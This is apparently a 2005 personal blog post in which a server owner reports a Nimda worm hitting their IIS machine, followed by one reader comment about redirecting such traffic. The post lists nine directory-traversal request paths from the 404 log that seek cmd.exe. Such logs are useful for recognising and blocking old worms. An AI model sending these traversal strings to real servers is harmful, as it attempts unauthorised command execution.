Worm!
My Windows (IIS) box was under worm attrack! The worm was Nimda and it had already generated about 215 hits.
Apparently it was trying to find my cmd.exe so as to take control of my Windows box. A few samples appeared in the Error 404 statistics:
- /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
- /exchange/check.bat/..%5c..%5c..%5cwinnt/system32/cmd.exe
- /_mem_bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
- /_vti_bin/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
- /exchange/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
- /cgi/check.bat/..%5c..%5c..%5cwinnt/system32/cmd.exe
- /PBServer/check.bat/..%5c..%5c..%5cwinnt/system32/cmd.exe
- /cgi/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
- /scripts/..%5c..%5cwinnt/system32/cmd.exe
1 Comments:
Note that troll and spam comments will be deleted without any notification.
At 5/26/2005 07:44:00 am, Gary W. Longsine said…
Attacks like these persist on the internet. I've seen Apache users who use re-write rules to redirect these attacks to /dev/null on UNIX systems, and one person with a sense of humor who redirected them to microsoft.com. That's rude, but really pretty funny, in a slipped-on-a-banana-peel sorta way. I probably shouldn't admit that.
/gary
Intrinsic Security: AntiWorm Defense In Depth
Post a Comment
<< Home